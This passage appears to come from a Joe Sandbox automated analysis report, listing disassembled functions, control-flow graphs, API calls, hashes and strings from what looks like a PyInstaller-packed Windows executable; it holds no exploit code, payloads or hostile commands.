                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: incorrect header check$invalid window size
                                                    • API String ID: 0-900081337
                                                    • Opcode ID: 7b159ed6ab11f424a85810e34fe73a423a8b15e185d016247a9cbb34ea0f7710
                                                    • Instruction ID: abd48c7ec566f16929f8badabb8e11de369fec34e634c839df872063e4ecb3c2
                                                    • Opcode Fuzzy Hash: 7b159ed6ab11f424a85810e34fe73a423a8b15e185d016247a9cbb34ea0f7710
                                                    • Instruction Fuzzy Hash: 7C91BA72A182D587E7A58F14D88CB7E3AA9FB84348F19413DDA4A967C0DFB8E540CB40
                                                    Function 00007FF652ED1700 Relevance: 24.6, APIs: 1, Strings: 13, Instructions: 148COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 7ff652ed1700-7ff652ed1714 1 7ff652ed172e-7ff652ed1732 0->1 2 7ff652ed1716-7ff652ed172d call 7ff652ed2b10 0->2 4 7ff652ed1734-7ff652ed173d call 7ff652ed12a0 1->4 5 7ff652ed1758-7ff652ed177b call 7ff652ed7e20 1->5 13 7ff652ed174f-7ff652ed1757 4->13 14 7ff652ed173f-7ff652ed174a call 7ff652ed2b10 4->14 11 7ff652ed177d-7ff652ed17a8 call 7ff652ed2870 5->11 12 7ff652ed17a9-7ff652ed17c4 call 7ff652ed4060 5->12 20 7ff652ed17de-7ff652ed17f1 call 7ff652ee1004 12->20 21 7ff652ed17c6-7ff652ed17d9 call 7ff652ed2b10 12->21 14->13 26 7ff652ed1813-7ff652ed1817 20->26 27 7ff652ed17f3-7ff652ed180e call 7ff652ed2870 20->27 28 7ff652ed191f-7ff652ed1922 call 7ff652ee097c 21->28 31 7ff652ed1831-7ff652ed1851 call 7ff652ee5780 26->31 32 7ff652ed1819-7ff652ed1825 call 7ff652ed1050 26->32 37 7ff652ed1917-7ff652ed191a call 7ff652ee097c 27->37 34 7ff652ed1927-7ff652ed193e 28->34 41 7ff652ed1872-7ff652ed1878 31->41 42 7ff652ed1853-7ff652ed186d call 7ff652ed2870 31->42 38 7ff652ed182a-7ff652ed182c 32->38 37->28 38->37 44 7ff652ed1905-7ff652ed1908 call 7ff652ee576c 41->44 45 7ff652ed187e-7ff652ed1887 41->45 50 7ff652ed190d-7ff652ed1912 42->50 44->50 48 7ff652ed1890-7ff652ed18b2 call 7ff652ee0ccc 45->48 52 7ff652ed18b4-7ff652ed18cc call 7ff652ee140c 48->52 53 7ff652ed18e5-7ff652ed18ec 48->53 50->37 58 7ff652ed18d5-7ff652ed18e3 52->58 59 7ff652ed18ce-7ff652ed18d1 52->59 55 7ff652ed18f3-7ff652ed18fb call 7ff652ed2870 53->55 62 7ff652ed1900 55->62 58->55 59->48 61 7ff652ed18d3 59->61 61->62 62->44
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Message
                                                    • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc$pyi_arch_extract2fs was called before temporary directory was initialized!
                                                    • API String ID: 2030045667-3833288071
                                                    • Opcode ID: c5d2b1fe77158624b544ad189e1269337dcf1207535d0e93ed6b37356d3eb2cf
                                                    • Instruction ID: bec636a23b368cec6d45e9a484c1a1a1560773c4d4407361b0a5df1b768b826e
                                                    • Opcode Fuzzy Hash: c5d2b1fe77158624b544ad189e1269337dcf1207535d0e93ed6b37356d3eb2cf
                                                    • Instruction Fuzzy Hash: 2C51B066B186A382EB10DB11EC102BA6351BF85BD8F4C503DDE4DAB6A6DFBCE544C300
                                                    Function 00007FF652ED1A90 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 135COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _fread_nolock$Message
                                                    • String ID: Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                    • API String ID: 677216364-1384898525
                                                    • Opcode ID: bf128d8c0f4f5afb435b79e4ddcccd3715ca7ff058bce9239159cfeb574f13cf
                                                    • Instruction ID: 7f5e1cfbb4048fc3409d79c7b7cc7cac95eec8d3311b56405f27a393616b408e
                                                    • Opcode Fuzzy Hash: bf128d8c0f4f5afb435b79e4ddcccd3715ca7ff058bce9239159cfeb574f13cf
                                                    • Instruction Fuzzy Hash: 42518372A1965286EB18DF24EC501B933A0EF88B8CF59853DDA0DE7795DEBCE440C704
                                                    Function 00007FF652ED8290 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 90processsynchronizationCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                    • String ID: CreateProcessW$Error creating child process!
                                                    • API String ID: 2895956056-3524285272
                                                    • Opcode ID: b7abaf37a347f063a3628d3e0586489636cc93df3d8b7db5f5a9dd5ff1266243
                                                    • Instruction ID: 5bd2df48b4d1b6d0ac0c9d186641800ec3adcdfdf96b928d19c984ed873b47b5
                                                    • Opcode Fuzzy Hash: b7abaf37a347f063a3628d3e0586489636cc93df3d8b7db5f5a9dd5ff1266243
                                                    • Instruction Fuzzy Hash: F2413332A0879281DA20DB64F8552AAB3A4FF94368F54073DE6AD937E5DFBCD0458B00
                                                    Function 00007FF652ED1050 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 154COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 511 7ff652ed1050-7ff652ed10ab call 7ff652edb840 514 7ff652ed10d3-7ff652ed10eb call 7ff652ee5780 511->514 515 7ff652ed10ad-7ff652ed10d2 call 7ff652ed2b10 511->515 520 7ff652ed10ed-7ff652ed1104 call 7ff652ed2870 514->520 521 7ff652ed1109-7ff652ed1119 call 7ff652ee5780 514->521 526 7ff652ed1264-7ff652ed1279 call 7ff652edb520 call 7ff652ee576c * 2 520->526 527 7ff652ed111b-7ff652ed1132 call 7ff652ed2870 521->527 528 7ff652ed1137-7ff652ed1149 521->528 543 7ff652ed127e-7ff652ed1298 526->543 527->526 529 7ff652ed1150-7ff652ed1175 call 7ff652ee0ccc 528->529 537 7ff652ed117b-7ff652ed1185 call 7ff652ee0a40 529->537 538 7ff652ed125c 529->538 537->538 544 7ff652ed118b-7ff652ed1197 537->544 538->526 545 7ff652ed11a0-7ff652ed11c8 call 7ff652ed9c80 544->545 548 7ff652ed1241-7ff652ed1257 call 7ff652ed2b10 545->548 549 7ff652ed11ca-7ff652ed11cd 545->549 548->538 550 7ff652ed11cf-7ff652ed11d9 549->550 551 7ff652ed123c 549->551 553 7ff652ed1203-7ff652ed1206 550->553 554 7ff652ed11db-7ff652ed11e8 call 7ff652ee140c 550->554 551->548 555 7ff652ed1208-7ff652ed1216 call 7ff652efaee0 553->555 556 7ff652ed1219-7ff652ed121e 553->556 560 7ff652ed11ed-7ff652ed11f0 554->560 555->556 556->545 559 7ff652ed1220-7ff652ed1223 556->559 564 7ff652ed1225-7ff652ed1228 559->564 565 7ff652ed1237-7ff652ed123a 559->565 561 7ff652ed11f2-7ff652ed11fc call 7ff652ee0a40 560->561 562 7ff652ed11fe-7ff652ed1201 560->562 561->556 561->562 562->548 564->548 567 7ff652ed122a-7ff652ed1232 564->567 565->538 567->529
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Message
                                                    • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                    • API String ID: 2030045667-2813020118
                                                    • Opcode ID: 5dc8684a2cecf44269f5f0e1ce28f82f05211f012bd0d83bdec862f8be7225c5
                                                    • Instruction ID: b572667fd735d1ab09e733ff8569aa201d89fed2f3c8d6100cc25e2ffb32be16
                                                    • Opcode Fuzzy Hash: 5dc8684a2cecf44269f5f0e1ce28f82f05211f012bd0d83bdec862f8be7225c5
                                                    • Instruction Fuzzy Hash: D6519D22A096A285EB60DB51EC403BA6391BB84798F4C413DEE4DEB785EFBCE545D700
                                                    Function 00007FF652EEF9C0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF652EEFD5A,?,?,-00000018,00007FF652EEBB0B,?,?,?,00007FF652EEBA02,?,?,?,00007FF652EE698E), ref: 00007FF652EEFB3C
                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF652EEFD5A,?,?,-00000018,00007FF652EEBB0B,?,?,?,00007FF652EEBA02,?,?,?,00007FF652EE698E), ref: 00007FF652EEFB48
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeLibraryProc
                                                    • String ID: api-ms-$ext-ms-
                                                    • API String ID: 3013587201-537541572
                                                    • Opcode ID: 92e1c6cccb7ec25b4476ca22e51d2624e921c13e1215ab17a1d429f3080250c2
                                                    • Instruction ID: 455373e0c1bfe121e2d0e11226f624022cb8320ed2d81fae9f4f2f02e7430fa0
                                                    • Opcode Fuzzy Hash: 92e1c6cccb7ec25b4476ca22e51d2624e921c13e1215ab17a1d429f3080250c2
                                                    • Instruction Fuzzy Hash: 3441E132B19A2381FA16DB16AC105B62396BF45B98F4D513DDD0EFB794EEBCE4458300
                                                    Function 00007FF652EEC80C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 844 7ff652eec80c-7ff652eec832 845 7ff652eec834-7ff652eec848 call 7ff652ee5c94 call 7ff652ee5cb4 844->845 846 7ff652eec84d-7ff652eec851 844->846 864 7ff652eecc3e 845->864 848 7ff652eecc27-7ff652eecc33 call 7ff652ee5c94 call 7ff652ee5cb4 846->848 849 7ff652eec857-7ff652eec85e 846->849 867 7ff652eecc39 call 7ff652eeb698 848->867 849->848 850 7ff652eec864-7ff652eec892 849->850 850->848 853 7ff652eec898-7ff652eec89f 850->853 856 7ff652eec8a1-7ff652eec8b3 call 7ff652ee5c94 call 7ff652ee5cb4 853->856 857 7ff652eec8b8-7ff652eec8bb 853->857 856->867 862 7ff652eecc23-7ff652eecc25 857->862 863 7ff652eec8c1-7ff652eec8c7 857->863 865 7ff652eecc41-7ff652eecc58 862->865 863->862 868 7ff652eec8cd-7ff652eec8d0 863->868 864->865 867->864 868->856 871 7ff652eec8d2-7ff652eec8f7 868->871 873 7ff652eec92a-7ff652eec931 871->873 874 7ff652eec8f9-7ff652eec8fb 871->874 875 7ff652eec933-7ff652eec95b call 7ff652eee3ac call 7ff652eeb700 * 2 873->875 876 7ff652eec906-7ff652eec91d call 7ff652ee5c94 call 7ff652ee5cb4 call 7ff652eeb698 873->876 877 7ff652eec922-7ff652eec928 874->877 878 7ff652eec8fd-7ff652eec904 874->878 909 7ff652eec95d-7ff652eec973 call 7ff652ee5cb4 call 7ff652ee5c94 875->909 910 7ff652eec978-7ff652eec9a3 call 7ff652eed034 875->910 907 7ff652eecab0 876->907 879 7ff652eec9a8-7ff652eec9bf 877->879 878->876 878->877 882 7ff652eec9c1-7ff652eec9c9 879->882 883 7ff652eeca3a-7ff652eeca44 call 7ff652ef476c 879->883 882->883 888 7ff652eec9cb-7ff652eec9cd 882->888 894 7ff652eecace 883->894 895 7ff652eeca4a-7ff652eeca5f 883->895 888->883 892 7ff652eec9cf-7ff652eec9e5 888->892 892->883 897 7ff652eec9e7-7ff652eec9f3 892->897 903 7ff652eecad3-7ff652eecaf3 ReadFile 894->903 895->894 899 7ff652eeca61-7ff652eeca73 GetConsoleMode 895->899 897->883 901 7ff652eec9f5-7ff652eec9f7 897->901 899->894 906 7ff652eeca75-7ff652eeca7d 899->906 901->883 908 7ff652eec9f9-7ff652eeca11 901->908 904 7ff652eecbed-7ff652eecbf6 GetLastError 903->904 905 7ff652eecaf9-7ff652eecb01 903->905 914 7ff652eecc13-7ff652eecc16 904->914 915 7ff652eecbf8-7ff652eecc0e call 7ff652ee5cb4 call 7ff652ee5c94 904->915 905->904 911 7ff652eecb07 905->911 906->903 913 7ff652eeca7f-7ff652eecaa1 ReadConsoleW 906->913 916 7ff652eecab3-7ff652eecabd call 7ff652eeb700 907->916 908->883 917 7ff652eeca13-7ff652eeca1f 908->917 909->907 910->879 919 7ff652eecb0e-7ff652eecb23 911->919 921 7ff652eecac2-7ff652eecacc 913->921 922 7ff652eecaa3 GetLastError 913->922 926 7ff652eecc1c-7ff652eecc1e 914->926 927 7ff652eecaa9-7ff652eecaab call 7ff652ee5c28 914->927 915->907 916->865 917->883 925 7ff652eeca21-7ff652eeca23 917->925 919->916 930 7ff652eecb25-7ff652eecb30 919->930 921->919 922->927 925->883 934 7ff652eeca25-7ff652eeca35 925->934 926->916 927->907 936 7ff652eecb32-7ff652eecb4b call 7ff652eec424 930->936 937 7ff652eecb57-7ff652eecb5f 930->937 934->883 944 7ff652eecb50-7ff652eecb52 936->944 940 7ff652eecb61-7ff652eecb73 937->940 941 7ff652eecbdb-7ff652eecbe8 call 7ff652eec264 937->941 945 7ff652eecb75 940->945 946 7ff652eecbce-7ff652eecbd6 940->946 941->944 944->916 948 7ff652eecb7a-7ff652eecb81 945->948 946->916 949 7ff652eecb83-7ff652eecb87 948->949 950 7ff652eecbbd-7ff652eecbc8 948->950 951 7ff652eecba3 949->951 952 7ff652eecb89-7ff652eecb90 949->952 950->946 953 7ff652eecba9-7ff652eecbb9 951->953 952->951 954 7ff652eecb92-7ff652eecb96 952->954 953->948 955 7ff652eecbbb 953->955 954->951 956 7ff652eecb98-7ff652eecba1 954->956 955->946 956->953
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: 08457a1c6721881f4c11fed91b7cfb17c1058ae71b93dddd692bbf3e619047ea
                                                    • Instruction ID: 8b5cbaf2da0721ea4757cbf26fe5d2555cc55c843bdbb5bfa0fbcc3a71662eaa
                                                    • Opcode Fuzzy Hash: 08457a1c6721881f4c11fed91b7cfb17c1058ae71b93dddd692bbf3e619047ea
                                                    • Instruction Fuzzy Hash: 45C1F623A0C7A791EB618B1498502BE3755FB80B88F5D2139DA4EB7791DEFCE846C300
                                                    Function 00007FF652ED8860 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                    • String ID:
                                                    • API String ID: 995526605-0
                                                    • Opcode ID: 0a78fddd52e4a4b47c0abd3b9ff92470e3f80b7b026c685fad37238cb9e723cb
                                                    • Instruction ID: fb61da6a65fef14c8a9792a61479714cbd6bd91582d344446e7c5d90f969e9a6
                                                    • Opcode Fuzzy Hash: 0a78fddd52e4a4b47c0abd3b9ff92470e3f80b7b026c685fad37238cb9e723cb
                                                    • Instruction Fuzzy Hash: 2C21993260C65281EB10DB55F94453AA3A1FFC57A8F58023DDA9C93AD4DFBCD4568700
                                                    Function 00007FF652ED8B80 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00007FF652ED8860: GetCurrentProcess.KERNEL32 ref: 00007FF652ED8880
                                                      • Part of subcall function 00007FF652ED8860: OpenProcessToken.ADVAPI32 ref: 00007FF652ED8891
                                                      • Part of subcall function 00007FF652ED8860: GetTokenInformation.KERNELBASE ref: 00007FF652ED88B6
                                                      • Part of subcall function 00007FF652ED8860: GetLastError.KERNEL32 ref: 00007FF652ED88C0
                                                      • Part of subcall function 00007FF652ED8860: GetTokenInformation.KERNELBASE ref: 00007FF652ED8900
                                                      • Part of subcall function 00007FF652ED8860: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF652ED891C
                                                      • Part of subcall function 00007FF652ED8860: CloseHandle.KERNEL32 ref: 00007FF652ED8934
                                                    • LocalFree.KERNEL32(00000000,00007FF652ED3B4E), ref: 00007FF652ED8C0C
                                                    • LocalFree.KERNEL32 ref: 00007FF652ED8C15
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                    • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PATH_MAX!
                                                    • API String ID: 6828938-1817031585
                                                    • Opcode ID: b6111afcc3eeb0b408ea35522252114c0c7814765020da058c7306c730e1b11f
                                                    • Instruction ID: 0e572d05f9a62d37f22585e6969a8d7b97c99525aa22897262924a16ff28adab
                                                    • Opcode Fuzzy Hash: b6111afcc3eeb0b408ea35522252114c0c7814765020da058c7306c730e1b11f
                                                    • Instruction Fuzzy Hash: D4219032A1875281F710DB20FC056FA6260EF84788F8C153EE94DE3696DFBCE5418640
                                                    Function 00007FF652ED3F00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(?,00007FF652ED39CA), ref: 00007FF652ED3F34
                                                      • Part of subcall function 00007FF652ED29C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF652ED8AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF652ED101D), ref: 00007FF652ED29F4
                                                      • Part of subcall function 00007FF652ED29C0: MessageBoxW.USER32 ref: 00007FF652ED2AD0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastMessageModuleName
                                                    • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                    • API String ID: 2581892565-1977442011
                                                    • Opcode ID: 7ef307d93855c796adb502a26685baad3249a75f128fd8c4618b636fbd62cd4f
                                                    • Instruction ID: a3b8c7d9f08add37f88ab318ff21bf074529e4b88963432268d2c23e1c962f2f
                                                    • Opcode Fuzzy Hash: 7ef307d93855c796adb502a26685baad3249a75f128fd8c4618b636fbd62cd4f
                                                    • Instruction Fuzzy Hash: 27118721B1C56741FB259721EC513FA5364AF887CCF48043EE84EE6AD9EEDCE5458B00
                                                    Function 00007FF652EEDD10 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF652EEDCFB), ref: 00007FF652EEDE2C
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF652EEDCFB), ref: 00007FF652EEDEB7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: ConsoleErrorLastMode
                                                    • String ID:
                                                    • API String ID: 953036326-0
                                                    • Opcode ID: e5bc4118b78d7803f2849d3b40dbb6165d02ed41efd1a206ffcb3739746c0941
                                                    • Instruction ID: ddcd89b9d8b3b2f5f207e9e69154c7c701be9947f1915117d1dd30dd202e8fa3
                                                    • Opcode Fuzzy Hash: e5bc4118b78d7803f2849d3b40dbb6165d02ed41efd1a206ffcb3739746c0941
                                                    • Instruction Fuzzy Hash: EB91D262E1866385F760DF6598442BD2BA9AB11B8CF5C413DDE0EB7B94CFB8D442C300
                                                    Function 00007FF652EF04DC Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
